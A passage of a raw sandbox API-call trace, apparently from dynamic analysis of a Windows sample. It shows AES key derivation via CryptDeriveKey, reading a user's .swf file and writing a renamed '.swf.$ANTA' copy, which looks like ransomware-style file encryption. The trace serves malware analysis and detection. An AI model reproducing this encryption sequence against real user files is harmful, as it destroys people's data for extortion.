[0108.320] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0108.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0108.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0108.320] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac140) returned 1 [0108.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0108.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0108.320] CryptDestroyHash (hHash=0x41ac040) returned 1 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0108.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0108.321] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0108.321] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0108.321] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0108.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0108.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0108.322] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\du9vqvjn.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0108.322] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.322] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.322] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0108.322] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0108.323] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0108.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0108.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0108.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0108.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0108.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7e48 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4b68 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7e48 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0108.324] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm")) returned 0x10 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4b68 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0108.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0108.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0108.325] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\du9vqvjn.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0108.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0108.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0108.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.325] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0108.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0108.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0108.325] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0108.326] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0108.326] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0108.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0108.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0108.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0108.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0108.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0108.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e09020 [0108.372] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0108.372] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0108.374] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x35eb, lpOverlapped=0x0) returned 1 [0108.374] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0108.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0108.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135eb) returned 0x4516010 [0108.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e09020 | out: hHeap=0x1780000) returned 1 [0108.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135eb) returned 0x4529608 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.378] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135eb) returned 0x4516010 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.378] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0108.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0108.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0108.379] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0108.379] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0108.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0108.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0108.379] 